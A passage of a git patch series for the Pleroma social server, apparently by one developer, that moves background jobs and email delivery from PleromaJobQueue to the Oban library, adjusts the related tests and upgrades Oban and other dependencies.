alias Pleroma.Notification
alias Pleroma.Repo
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.User
alias Pleroma.Web.CommonAPI
import Pleroma.Factory
@@ -50,8 +52,7 @@ test "it imports follow lists from file", %{conn: conn} do
{File, [],
read!: fn "follow_list.txt" ->
"Account address,Show boosts\n#{user2.ap_id},true"
- end},
- {PleromaJobQueue, [:passthrough], []}
+ end}
]) do
response =
conn
@@ -59,15 +60,16 @@ test "it imports follow lists from file", %{conn: conn} do
|> post("/api/pleroma/follow_import", %{"list" => %Plug.Upload{path: "follow_list.txt"}})
|> json_response(:ok)
- assert called(
- PleromaJobQueue.enqueue(
- :background,
- User,
- [:follow_import, user1, [user2.ap_id]]
- )
- )
-
assert response == "job started"
+
+ assert ObanHelpers.member?(
+ %{
+ "op" => "follow_import",
+ "follower_id" => user1.id,
+ "followed_identifiers" => [user2.ap_id]
+ },
+ all_enqueued(worker: Pleroma.Workers.BackgroundWorker)
+ )
end
end
@@ -126,8 +128,7 @@ test "it imports blocks users from file", %{conn: conn} do
user3 = insert(:user)
with_mocks([
- {File, [], read!: fn "blocks_list.txt" -> "#{user2.ap_id} #{user3.ap_id}" end},
- {PleromaJobQueue, [:passthrough], []}
+ {File, [], read!: fn "blocks_list.txt" -> "#{user2.ap_id} #{user3.ap_id}" end}
]) do
response =
conn
@@ -135,15 +136,16 @@ test "it imports blocks users from file", %{conn: conn} do
|> post("/api/pleroma/blocks_import", %{"list" => %Plug.Upload{path: "blocks_list.txt"}})
|> json_response(:ok)
- assert called(
- PleromaJobQueue.enqueue(
- :background,
- User,
- [:blocks_import, user1, [user2.ap_id, user3.ap_id]]
- )
- )
-
assert response == "job started"
+
+ assert ObanHelpers.member?(
+ %{
+ "op" => "blocks_import",
+ "blocker_id" => user1.id,
+ "blocked_identifiers" => [user2.ap_id, user3.ap_id]
+ },
+ all_enqueued(worker: Pleroma.Workers.BackgroundWorker)
+ )
end
end
end
@@ -607,6 +609,7 @@ test "it returns HTTP 200", %{conn: conn} do
|> json_response(:ok)
assert response == %{"status" => "success"}
+ ObanHelpers.perform_all()
user = User.get_cached_by_id(user.id)
diff --git a/test/web/websub/websub_test.exs b/test/web/websub/websub_test.exs
index b704a558a..414610879 100644
--- a/test/web/websub/websub_test.exs
+++ b/test/web/websub/websub_test.exs
@@ -6,7 +6,7 @@ defmodule Pleroma.Web.WebsubTest do
use Pleroma.DataCase
use Oban.Testing, repo: Pleroma.Repo
- alias Pleroma.ObanHelpers
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.Web.Router.Helpers
alias Pleroma.Web.Websub
alias Pleroma.Web.Websub.WebsubClientSubscription
From a180c1360ecdbed76eccf3435bb2c831356746bc Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Wed, 14 Aug 2019 21:42:21 +0300
Subject: [PATCH 005/272] [#1149] Oban mailer job. Adjusted tests.
---
lib/pleroma/application.ex | 1 +
lib/pleroma/emails/mailer.ex | 13 ++++++++++++-
lib/pleroma/workers/mailer.ex | 9 +++++++++
test/mix/tasks/pleroma.digest_test.exs | 3 +++
.../mastodon_api/mastodon_api_controller_test.exs | 4 ++++
.../web/twitter_api/twitter_api_controller_test.exs | 4 ++++
test/web/twitter_api/twitter_api_test.exs | 2 ++
7 files changed, 35 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/application.ex b/lib/pleroma/application.ex
index 5550a4902..7cf60f44a 100644
--- a/lib/pleroma/application.ex
+++ b/lib/pleroma/application.ex
@@ -233,6 +233,7 @@ defp hackney_pool_children do
defp after_supervisor_start do
with digest_config <- Application.get_env(:pleroma, :email_notifications)[:digest],
true <- digest_config[:active] do
+ # TODO: consider replacing with `quantum` scheduler
PleromaJobQueue.schedule(
digest_config[:schedule],
:digest_emails,
diff --git a/lib/pleroma/emails/mailer.ex b/lib/pleroma/emails/mailer.ex
index 2e4657b7c..bb534f602 100644
--- a/lib/pleroma/emails/mailer.ex
+++ b/lib/pleroma/emails/mailer.ex
@@ -9,6 +9,8 @@ defmodule Pleroma.Emails.Mailer do
The module contains functions to delivery email using Swoosh.Mailer.
"""
+ alias Pleroma.Repo
+ alias Pleroma.Workers.Mailer, as: MailerWorker
alias Swoosh.DeliveryError
@otp_app :pleroma
@@ -17,9 +19,18 @@ defmodule Pleroma.Emails.Mailer do
@spec enabled?() :: boolean()
def enabled?, do: Pleroma.Config.get([__MODULE__, :enabled])
+ defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+
@doc "add email to queue"
def deliver_async(email, config \\ []) do
- PleromaJobQueue.enqueue(:mailer, __MODULE__, [:deliver_async, email, config])
+ encoded_email =
+ email
+ |> :erlang.term_to_binary()
+ |> Base.encode64()
+
+ %{"op" => "email", "encoded_email" => encoded_email, "config" => config}
+ |> MailerWorker.new(worker_args(:mailer))
+ |> Repo.insert()
end
@doc "callback to perform send email from queue"
diff --git a/lib/pleroma/workers/mailer.ex b/lib/pleroma/workers/mailer.ex
index da7fa6fd5..8bf9952bc 100644
--- a/lib/pleroma/workers/mailer.ex
+++ b/lib/pleroma/workers/mailer.ex
@@ -11,6 +11,15 @@ defmodule Pleroma.Workers.Mailer do
max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
@impl Oban.Worker
+ def perform(%{"op" => "email", "encoded_email" => encoded_email, "config" => config}) do
+ email =
+ encoded_email
+ |> Base.decode64!()
+ |> :erlang.binary_to_term()
+
+ Pleroma.Emails.Mailer.deliver(email, config)
+ end
+
def perform(%{"op" => "digest_email", "user_id" => user_id}) do
user = User.get_by_id(user_id)
Pleroma.DigestEmailWorker.perform(user)
diff --git a/test/mix/tasks/pleroma.digest_test.exs b/test/mix/tasks/pleroma.digest_test.exs
index 595f64ed7..5fbeac0d6 100644
--- a/test/mix/tasks/pleroma.digest_test.exs
+++ b/test/mix/tasks/pleroma.digest_test.exs
@@ -4,6 +4,7 @@ defmodule Mix.Tasks.Pleroma.DigestTest do
import Pleroma.Factory
import Swoosh.TestAssertions
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.Web.CommonAPI
setup_all do
@@ -39,6 +40,8 @@ test "Sends digest to the given user" do
:ok = Mix.Tasks.Pleroma.Digest.run(["test", user2.nickname, yesterday_date])
+ ObanHelpers.perform_all()
+
assert_receive {:mix_shell, :info, [message]}
assert message =~ "Digest email have been sent"
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index e49c4cc22..be9ff2568 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -11,6 +11,7 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do
alias Pleroma.Object
alias Pleroma.Repo
alias Pleroma.ScheduledActivity
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.User
alias Pleroma.Web.ActivityPub.ActivityPub
alias Pleroma.Web.CommonAPI
@@ -3871,6 +3872,7 @@ test "it creates a PasswordResetToken record for user", %{user: user} do
end
test "it sends an email to user", %{user: user} do
+ ObanHelpers.perform_all()
token_record = Repo.get_by(Pleroma.PasswordResetToken, user_id: user.id)
email = Pleroma.Emails.UserEmail.password_reset_email(user, token_record.token)
@@ -3934,6 +3936,8 @@ test "resend account confirmation email", %{conn: conn, user: user} do
|> post("/api/v1/pleroma/accounts/confirmation_resend?email=#{user.email}")
|> json_response(:no_content)
+ ObanHelpers.perform_all()
+
email = Pleroma.Emails.UserEmail.account_confirmation_email(user)
notify_email = Pleroma.Config.get([:instance, :notify_email])
instance_name = Pleroma.Config.get([:instance, :name])
diff --git a/test/web/twitter_api/twitter_api_controller_test.exs b/test/web/twitter_api/twitter_api_controller_test.exs
index 8bb8aa36d..9ac4ff929 100644
--- a/test/web/twitter_api/twitter_api_controller_test.exs
+++ b/test/web/twitter_api/twitter_api_controller_test.exs
@@ -12,6 +12,7 @@ defmodule Pleroma.Web.TwitterAPI.ControllerTest do
alias Pleroma.Notification
alias Pleroma.Object
alias Pleroma.Repo
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.User
alias Pleroma.Web.ActivityPub.ActivityPub
alias Pleroma.Web.CommonAPI
@@ -1099,6 +1100,7 @@ test "it creates a PasswordResetToken record for user", %{user: user} do
end
test "it sends an email to user", %{user: user} do
+ ObanHelpers.perform_all()
token_record = Repo.get_by(Pleroma.PasswordResetToken, user_id: user.id)
email = Pleroma.Emails.UserEmail.password_reset_email(user, token_record.token)
@@ -1209,6 +1211,8 @@ test "it sends confirmation email", %{conn: conn, user: user} do
|> assign(:user, user)
|> post("/api/account/resend_confirmation_email?email=#{user.email}")
+ ObanHelpers.perform_all()
+
email = Pleroma.Emails.UserEmail.account_confirmation_email(user)
notify_email = Pleroma.Config.get([:instance, :notify_email])
instance_name = Pleroma.Config.get([:instance, :name])
diff --git a/test/web/twitter_api/twitter_api_test.exs b/test/web/twitter_api/twitter_api_test.exs
index cbe83852e..bf063a0de 100644
--- a/test/web/twitter_api/twitter_api_test.exs
+++ b/test/web/twitter_api/twitter_api_test.exs
@@ -7,6 +7,7 @@ defmodule Pleroma.Web.TwitterAPI.TwitterAPITest do
alias Pleroma.Activity
alias Pleroma.Object
alias Pleroma.Repo
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.User
alias Pleroma.UserInviteToken
alias Pleroma.Web.ActivityPub.ActivityPub
@@ -321,6 +322,7 @@ test "it sends confirmation email if :account_activation_required is specified i
}
{:ok, user} = TwitterAPI.register_user(data)
+ ObanHelpers.perform_all()
assert user.info.confirmation_pending
From c29686309eaf2cdae039ce813755c0e23cdc4a03 Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Fri, 23 Aug 2019 09:23:10 +0300
Subject: [PATCH 006/272] [#1149] Upgraded `oban` from 0.6.0 to 0.7.1.
---
config/config.exs | 1 -
lib/pleroma/application.ex | 5 +--
lib/pleroma/workers/background_worker.ex | 42 +++++++++++--------
lib/pleroma/workers/mailer.ex | 6 +--
lib/pleroma/workers/publisher.ex | 6 +--
lib/pleroma/workers/receiver.ex | 6 +--
.../workers/scheduled_activity_worker.ex | 4 +-
lib/pleroma/workers/subscriber.ex | 8 ++--
lib/pleroma/workers/transmogrifier.ex | 4 +-
lib/pleroma/workers/web_pusher.ex | 4 +-
mix.exs | 2 +-
mix.lock | 10 ++---
test/support/oban_helpers.ex | 2 +-
13 files changed, 51 insertions(+), 49 deletions(-)
diff --git a/config/config.exs b/config/config.exs
index 9794997d9..1a6348bcd 100644
--- a/config/config.exs
+++ b/config/config.exs
@@ -469,7 +469,6 @@
config :pleroma, :workers,
retries: [
- compile_time_default: 1,
federator_incoming: 5,
federator_outgoing: 5
]
diff --git a/lib/pleroma/application.ex b/lib/pleroma/application.ex
index 2e2922d28..384b03aa9 100644
--- a/lib/pleroma/application.ex
+++ b/lib/pleroma/application.ex
@@ -41,10 +41,7 @@ def start(_type, _args) do
hackney_pool_children() ++
[
Pleroma.Stats,
- %{
- id: Oban,
- start: {Oban, :start_link, [Application.get_env(:pleroma, Oban)]}
- },
+ {Oban, Application.get_env(:pleroma, Oban)},
%{
id: :web_push_init,
start: {Task, :start_link, [&Pleroma.Web.Push.init/0]},
diff --git a/lib/pleroma/workers/background_worker.ex b/lib/pleroma/workers/background_worker.ex
index 3ab2b6bcc..3c021b9b4 100644
--- a/lib/pleroma/workers/background_worker.ex
+++ b/lib/pleroma/workers/background_worker.ex
@@ -11,55 +11,61 @@ defmodule Pleroma.Workers.BackgroundWorker do
# Note: `max_attempts` is intended to be overridden in `new/1` call
use Oban.Worker,
queue: "background",
- max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+ max_attempts: 1
@impl Oban.Worker
- def perform(%{"op" => "fetch_initial_posts", "user_id" => user_id}) do
+ def perform(%{"op" => "fetch_initial_posts", "user_id" => user_id}, _job) do
user = User.get_by_id(user_id)
User.perform(:fetch_initial_posts, user)
end
- def perform(%{"op" => "deactivate_user", "user_id" => user_id, "status" => status}) do
+ def perform(%{"op" => "deactivate_user", "user_id" => user_id, "status" => status}, _job) do
user = User.get_by_id(user_id)
User.perform(:deactivate_async, user, status)
end
- def perform(%{"op" => "delete_user", "user_id" => user_id}) do
+ def perform(%{"op" => "delete_user", "user_id" => user_id}, _job) do
user = User.get_by_id(user_id)
User.perform(:delete, user)
end
- def perform(%{
- "op" => "blocks_import",
- "blocker_id" => blocker_id,
- "blocked_identifiers" => blocked_identifiers
- }) do
+ def perform(
+ %{
+ "op" => "blocks_import",
+ "blocker_id" => blocker_id,
+ "blocked_identifiers" => blocked_identifiers
+ },
+ _job
+ ) do
blocker = User.get_by_id(blocker_id)
User.perform(:blocks_import, blocker, blocked_identifiers)
end
- def perform(%{
- "op" => "follow_import",
- "follower_id" => follower_id,
- "followed_identifiers" => followed_identifiers
- }) do
+ def perform(
+ %{
+ "op" => "follow_import",
+ "follower_id" => follower_id,
+ "followed_identifiers" => followed_identifiers
+ },
+ _job
+ ) do
follower = User.get_by_id(follower_id)
User.perform(:follow_import, follower, followed_identifiers)
end
- def perform(%{"op" => "clean_expired_tokens"}) do
+ def perform(%{"op" => "clean_expired_tokens"}, _job) do
CleanWorker.perform(:clean)
end
- def perform(%{"op" => "media_proxy_preload", "message" => message}) do
+ def perform(%{"op" => "media_proxy_preload", "message" => message}, _job) do
MediaProxyWarmingPolicy.perform(:preload, message)
end
- def perform(%{"op" => "media_proxy_prefetch", "url" => url}) do
+ def perform(%{"op" => "media_proxy_prefetch", "url" => url}, _job) do
MediaProxyWarmingPolicy.perform(:prefetch, url)
end
- def perform(%{"op" => "fetch_data_for_activity", "activity_id" => activity_id}) do
+ def perform(%{"op" => "fetch_data_for_activity", "activity_id" => activity_id}, _job) do
activity = Activity.get_by_id(activity_id)
Pleroma.Web.RichMedia.Helpers.perform(:fetch, activity)
end
diff --git a/lib/pleroma/workers/mailer.ex b/lib/pleroma/workers/mailer.ex
index 8bf9952bc..1cce2ea03 100644
--- a/lib/pleroma/workers/mailer.ex
+++ b/lib/pleroma/workers/mailer.ex
@@ -8,10 +8,10 @@ defmodule Pleroma.Workers.Mailer do
# Note: `max_attempts` is intended to be overridden in `new/1` call
use Oban.Worker,
queue: "mailer",
- max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+ max_attempts: 1
@impl Oban.Worker
- def perform(%{"op" => "email", "encoded_email" => encoded_email, "config" => config}) do
+ def perform(%{"op" => "email", "encoded_email" => encoded_email, "config" => config}, _job) do
email =
encoded_email
|> Base.decode64!()
@@ -20,7 +20,7 @@ def perform(%{"op" => "email", "encoded_email" => encoded_email, "config" => con
Pleroma.Emails.Mailer.deliver(email, config)
end
- def perform(%{"op" => "digest_email", "user_id" => user_id}) do
+ def perform(%{"op" => "digest_email", "user_id" => user_id}, _job) do
user = User.get_by_id(user_id)
Pleroma.DigestEmailWorker.perform(user)
end
diff --git a/lib/pleroma/workers/publisher.ex b/lib/pleroma/workers/publisher.ex
index c890ffb79..0a9084589 100644
--- a/lib/pleroma/workers/publisher.ex
+++ b/lib/pleroma/workers/publisher.ex
@@ -9,15 +9,15 @@ defmodule Pleroma.Workers.Publisher do
# Note: `max_attempts` is intended to be overridden in `new/1` call
use Oban.Worker,
queue: "federator_outgoing",
- max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+ max_attempts: 1
@impl Oban.Worker
- def perform(%{"op" => "publish", "activity_id" => activity_id}) do
+ def perform(%{"op" => "publish", "activity_id" => activity_id}, _job) do
activity = Activity.get_by_id(activity_id)
Federator.perform(:publish, activity)
end
- def perform(%{"op" => "publish_one", "module" => module_name, "params" => params}) do
+ def perform(%{"op" => "publish_one", "module" => module_name, "params" => params}, _job) do
Federator.perform(:publish_one, String.to_atom(module_name), params)
end
end
diff --git a/lib/pleroma/workers/receiver.ex b/lib/pleroma/workers/receiver.ex
index d3de95716..4ee270d74 100644
--- a/lib/pleroma/workers/receiver.ex
+++ b/lib/pleroma/workers/receiver.ex
@@ -8,14 +8,14 @@ defmodule Pleroma.Workers.Receiver do
# Note: `max_attempts` is intended to be overridden in `new/1` call
use Oban.Worker,
queue: "federator_incoming",
- max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+ max_attempts: 1
@impl Oban.Worker
- def perform(%{"op" => "incoming_doc", "body" => doc}) do
+ def perform(%{"op" => "incoming_doc", "body" => doc}, _job) do
Federator.perform(:incoming_doc, doc)
end
- def perform(%{"op" => "incoming_ap_doc", "params" => params}) do
+ def perform(%{"op" => "incoming_ap_doc", "params" => params}, _job) do
Federator.perform(:incoming_ap_doc, params)
end
end
diff --git a/lib/pleroma/workers/scheduled_activity_worker.ex b/lib/pleroma/workers/scheduled_activity_worker.ex
index a49834fd8..d9724c78a 100644
--- a/lib/pleroma/workers/scheduled_activity_worker.ex
+++ b/lib/pleroma/workers/scheduled_activity_worker.ex
@@ -6,10 +6,10 @@ defmodule Pleroma.Workers.ScheduledActivityWorker do
# Note: `max_attempts` is intended to be overridden in `new/1` call
use Oban.Worker,
queue: "scheduled_activities",
- max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+ max_attempts: 1
@impl Oban.Worker
- def perform(%{"op" => "execute", "activity_id" => activity_id}) do
+ def perform(%{"op" => "execute", "activity_id" => activity_id}, _job) do
Pleroma.ScheduledActivityWorker.perform(:execute, activity_id)
end
end
diff --git a/lib/pleroma/workers/subscriber.ex b/lib/pleroma/workers/subscriber.ex
index 6af3ad0a1..783c44173 100644
--- a/lib/pleroma/workers/subscriber.ex
+++ b/lib/pleroma/workers/subscriber.ex
@@ -10,19 +10,19 @@ defmodule Pleroma.Workers.Subscriber do
# Note: `max_attempts` is intended to be overridden in `new/1` call
use Oban.Worker,
queue: "federator_outgoing",
- max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+ max_attempts: 1
@impl Oban.Worker
- def perform(%{"op" => "refresh_subscriptions"}) do
+ def perform(%{"op" => "refresh_subscriptions"}, _job) do
Federator.perform(:refresh_subscriptions)
end
- def perform(%{"op" => "request_subscription", "websub_id" => websub_id}) do
+ def perform(%{"op" => "request_subscription", "websub_id" => websub_id}, _job) do
websub = Repo.get(WebsubClientSubscription, websub_id)
Federator.perform(:request_subscription, websub)
end
- def perform(%{"op" => "verify_websub", "websub_id" => websub_id}) do
+ def perform(%{"op" => "verify_websub", "websub_id" => websub_id}, _job) do
websub = Repo.get(WebsubClientSubscription, websub_id)
Federator.perform(:verify_websub, websub)
end
diff --git a/lib/pleroma/workers/transmogrifier.ex b/lib/pleroma/workers/transmogrifier.ex
index c6b4fab47..e13202c06 100644
--- a/lib/pleroma/workers/transmogrifier.ex
+++ b/lib/pleroma/workers/transmogrifier.ex
@@ -8,10 +8,10 @@ defmodule Pleroma.Workers.Transmogrifier do
# Note: `max_attempts` is intended to be overridden in `new/1` call
use Oban.Worker,
queue: "transmogrifier",
- max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+ max_attempts: 1
@impl Oban.Worker
- def perform(%{"op" => "user_upgrade", "user_id" => user_id}) do
+ def perform(%{"op" => "user_upgrade", "user_id" => user_id}, _job) do
user = User.get_by_id(user_id)
Pleroma.Web.ActivityPub.Transmogrifier.perform(:user_upgrade, user)
end
diff --git a/lib/pleroma/workers/web_pusher.ex b/lib/pleroma/workers/web_pusher.ex
index b99581eb0..7b78bb3ea 100644
--- a/lib/pleroma/workers/web_pusher.ex
+++ b/lib/pleroma/workers/web_pusher.ex
@@ -9,10 +9,10 @@ defmodule Pleroma.Workers.WebPusher do
# Note: `max_attempts` is intended to be overridden in `new/1` call
use Oban.Worker,
queue: "web_push",
- max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+ max_attempts: 1
@impl Oban.Worker
- def perform(%{"op" => "web_push", "notification_id" => notification_id}) do
+ def perform(%{"op" => "web_push", "notification_id" => notification_id}, _job) do
notification = Repo.get(Notification, notification_id)
Pleroma.Web.Push.Impl.perform(notification)
end
diff --git a/mix.exs b/mix.exs
index b651520ed..eb023313d 100644
--- a/mix.exs
+++ b/mix.exs
@@ -101,7 +101,7 @@ defp deps do
{:phoenix_ecto, "~> 4.0"},
{:ecto_sql, "~> 3.1"},
{:postgrex, ">= 0.13.5"},
- {:oban, "~> 0.6"},
+ {:oban, "~> 0.7"},
{:gettext, "~> 0.15"},
{:comeonin, "~> 4.1.1"},
{:pbkdf2_elixir, "~> 0.12.3"},
diff --git a/mix.lock b/mix.lock
index 52932c9ef..8b8596375 100644
--- a/mix.lock
+++ b/mix.lock
@@ -17,12 +17,12 @@
"credo": {:hex, :credo, "0.9.3", "76fa3e9e497ab282e0cf64b98a624aa11da702854c52c82db1bf24e54ab7c97a", [:mix], [{:bunt, "~> 0.2.0", [hex: :bunt, repo: "hexpm", optional: false]}, {:poison, ">= 0.0.0", [hex: :poison, repo: "hexpm", optional: false]}], "hexpm"},
"crontab": {:hex, :crontab, "1.1.7", "b9219f0bdc8678b94143655a8f229716c5810c0636a4489f98c0956137e53985", [:mix], [{:ecto, "~> 1.0 or ~> 2.0 or ~> 3.0", [hex: :ecto, repo: "hexpm", optional: true]}], "hexpm"},
"crypt": {:git, "https://github.com/msantos/crypt", "1f2b58927ab57e72910191a7ebaeff984382a1d3", [ref: "1f2b58927ab57e72910191a7ebaeff984382a1d3"]},
- "db_connection": {:hex, :db_connection, "2.0.6", "bde2f85d047969c5b5800cb8f4b3ed6316c8cb11487afedac4aa5f93fd39abfa", [:mix], [{:connection, "~> 1.0.2", [hex: :connection, repo: "hexpm", optional: false]}], "hexpm"},
+ "db_connection": {:hex, :db_connection, "2.1.1", "a51e8a2ee54ef2ae6ec41a668c85787ed40cb8944928c191280fe34c15b76ae5", [:mix], [{:connection, "~> 1.0.2", [hex: :connection, repo: "hexpm", optional: false]}], "hexpm"},
"decimal": {:hex, :decimal, "1.8.0", "ca462e0d885f09a1c5a342dbd7c1dcf27ea63548c65a65e67334f4b61803822e", [:mix], [], "hexpm"},
"deep_merge": {:hex, :deep_merge, "1.0.0", "b4aa1a0d1acac393bdf38b2291af38cb1d4a52806cf7a4906f718e1feb5ee961", [:mix], [], "hexpm"},
"earmark": {:hex, :earmark, "1.3.2", "b840562ea3d67795ffbb5bd88940b1bed0ed9fa32834915125ea7d02e35888a5", [:mix], [], "hexpm"},
- "ecto": {:hex, :ecto, "3.1.4", "69d852da7a9f04ede725855a35ede48d158ca11a404fe94f8b2fb3b2162cd3c9", [:mix], [{:decimal, "~> 1.6", [hex: :decimal, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}], "hexpm"},
- "ecto_sql": {:hex, :ecto_sql, "3.1.3", "2c536139190492d9de33c5fefac7323c5eaaa82e1b9bf93482a14649042f7cd9", [:mix], [{:db_connection, "~> 2.0", [hex: :db_connection, repo: "hexpm", optional: false]}, {:ecto, "~> 3.1.0", [hex: :ecto, repo: "hexpm", optional: false]}, {:mariaex, "~> 0.9.1", [hex: :mariaex, repo: "hexpm", optional: true]}, {:myxql, "~> 0.2.0", [hex: :myxql, repo: "hexpm", optional: true]}, {:postgrex, "~> 0.14.0", [hex: :postgrex, repo: "hexpm", optional: true]}, {:telemetry, "~> 0.4.0", [hex: :telemetry, repo: "hexpm", optional: false]}], "hexpm"},
+ "ecto": {:hex, :ecto, "3.1.7", "fa21d06ef56cdc2fdaa62574e8c3ba34a2751d44ea34c30bc65f0728421043e5", [:mix], [{:decimal, "~> 1.6", [hex: :decimal, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}], "hexpm"},
+ "ecto_sql": {:hex, :ecto_sql, "3.1.6", "1e80e30d16138a729c717f73dcb938590bcdb3a4502f3012414d0cbb261045d8", [:mix], [{:db_connection, "~> 2.0", [hex: :db_connection, repo: "hexpm", optional: false]}, {:ecto, "~> 3.1.0", [hex: :ecto, repo: "hexpm", optional: false]}, {:mariaex, "~> 0.9.1", [hex: :mariaex, repo: "hexpm", optional: true]}, {:myxql, "~> 0.2.0", [hex: :myxql, repo: "hexpm", optional: true]}, {:postgrex, "~> 0.14.0 or ~> 0.15.0", [hex: :postgrex, repo: "hexpm", optional: true]}, {:telemetry, "~> 0.4.0", [hex: :telemetry, repo: "hexpm", optional: false]}], "hexpm"},
"esshd": {:hex, :esshd, "0.1.0", "6f93a2062adb43637edad0ea7357db2702a4b80dd9683482fe00f5134e97f4c1", [:mix], [], "hexpm"},
"eternal": {:hex, :eternal, "1.2.0", "e2a6b6ce3b8c248f7dc31451aefca57e3bdf0e48d73ae5043229380a67614c41", [:mix], [], "hexpm"},
"ex2ms": {:hex, :ex2ms, "1.5.0", "19e27f9212be9a96093fed8cdfbef0a2b56c21237196d26760f11dfcfae58e97", [:mix], [], "hexpm"},
@@ -57,7 +57,7 @@
"mogrify": {:hex, :mogrify, "0.6.1", "de1b527514f2d95a7bbe9642eb556061afb337e220cf97adbf3a4e6438ed70af", [:mix], [], "hexpm"},
"mox": {:hex, :mox, "0.5.1", "f86bb36026aac1e6f924a4b6d024b05e9adbed5c63e8daa069bd66fb3292165b", [:mix], [], "hexpm"},
"nimble_parsec": {:hex, :nimble_parsec, "0.5.0", "90e2eca3d0266e5c53f8fbe0079694740b9c91b6747f2b7e3c5d21966bba8300", [:mix], [], "hexpm"},
- "oban": {:hex, :oban, "0.6.0", "8b9b861355610e703e58a878bc29959f3f0e1b4cd1e90d785cf2bb2498d3b893", [:mix], [{:ecto_sql, "~> 3.1", [hex: :ecto_sql, repo: "hexpm", optional: false]}, {:jason, "~> 1.1", [hex: :jason, repo: "hexpm", optional: false]}, {:postgrex, "~> 0.14", [hex: :postgrex, repo: "hexpm", optional: false]}, {:telemetry, "~> 0.4", [hex: :telemetry, repo: "hexpm", optional: false]}], "hexpm"},
+ "oban": {:hex, :oban, "0.7.1", "171bdd1b69c1a4a839f8c768f5e962fc22d1de1513d459fb6b8e0cbd34817a9a", [:mix], [{:ecto_sql, "~> 3.1", [hex: :ecto_sql, repo: "hexpm", optional: false]}, {:jason, "~> 1.1", [hex: :jason, repo: "hexpm", optional: false]}, {:postgrex, "~> 0.14", [hex: :postgrex, repo: "hexpm", optional: false]}, {:telemetry, "~> 0.4", [hex: :telemetry, repo: "hexpm", optional: false]}], "hexpm"},
"parse_trans": {:hex, :parse_trans, "3.3.0", "09765507a3c7590a784615cfd421d101aec25098d50b89d7aa1d66646bc571c1", [:rebar3], [], "hexpm"},
"pbkdf2_elixir": {:hex, :pbkdf2_elixir, "0.12.3", "6706a148809a29c306062862c803406e88f048277f6e85b68faf73291e820b84", [:mix], [], "hexpm"},
"phoenix": {:hex, :phoenix, "1.4.9", "746d098e10741c334d88143d3c94cab1756435f94387a63441792e66ec0ee974", [:mix], [{:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}, {:phoenix_pubsub, "~> 1.1", [hex: :phoenix_pubsub, repo: "hexpm", optional: false]}, {:plug, "~> 1.8.1 or ~> 1.9", [hex: :plug, repo: "hexpm", optional: false]}, {:plug_cowboy, "~> 1.0 or ~> 2.0", [hex: :plug_cowboy, repo: "hexpm", optional: true]}, {:telemetry, "~> 0.4", [hex: :telemetry, repo: "hexpm", optional: false]}], "hexpm"},
@@ -71,7 +71,7 @@
"plug_crypto": {:hex, :plug_crypto, "1.0.0", "18e49317d3fa343f24620ed22795ec29d4a5e602d52d1513ccea0b07d8ea7d4d", [:mix], [], "hexpm"},
"plug_static_index_html": {:hex, :plug_static_index_html, "1.0.0", "840123d4d3975585133485ea86af73cb2600afd7f2a976f9f5fd8b3808e636a0", [:mix], [{:plug, "~> 1.0", [hex: :plug, repo: "hexpm", optional: false]}], "hexpm"},
"poison": {:hex, :poison, "3.1.0", "d9eb636610e096f86f25d9a46f35a9facac35609a7591b3be3326e99a0484665", [:mix], [], "hexpm"},
- "postgrex": {:hex, :postgrex, "0.14.3", "5754dee2fdf6e9e508cbf49ab138df964278700b764177e8f3871e658b345a1e", [:mix], [{:connection, "~> 1.0", [hex: :connection, repo: "hexpm", optional: false]}, {:db_connection, "~> 2.0", [hex: :db_connection, repo: "hexpm", optional: false]}, {:decimal, "~> 1.5", [hex: :decimal, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}], "hexpm"},
+ "postgrex": {:hex, :postgrex, "0.15.0", "dd5349161019caeea93efa42f9b22f9d79995c3a86bdffb796427b4c9863b0f0", [:mix], [{:connection, "~> 1.0", [hex: :connection, repo: "hexpm", optional: false]}, {:db_connection, "~> 2.1", [hex: :db_connection, repo: "hexpm", optional: false]}, {:decimal, "~> 1.5", [hex: :decimal, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}], "hexpm"},
"prometheus": {:hex, :prometheus, "4.4.1", "1e96073b3ed7788053768fea779cbc896ddc3bdd9ba60687f2ad50b252ac87d6", [:mix, :rebar3], [], "hexpm"},
"prometheus_ecto": {:hex, :prometheus_ecto, "1.4.1", "6c768ea9654de871e5b32fab2eac348467b3021604ebebbcbd8bcbe806a65ed5", [:mix], [{:ecto, "~> 2.0 or ~> 3.0", [hex: :ecto, repo: "hexpm", optional: false]}, {:prometheus_ex, "~> 1.1 or ~> 2.0 or ~> 3.0", [hex: :prometheus_ex, repo: "hexpm", optional: false]}], "hexpm"},
"prometheus_ex": {:hex, :prometheus_ex, "3.0.5", "fa58cfd983487fc5ead331e9a3e0aa622c67232b3ec71710ced122c4c453a02f", [:mix], [{:prometheus, "~> 4.0", [hex: :prometheus, repo: "hexpm", optional: false]}], "hexpm"},
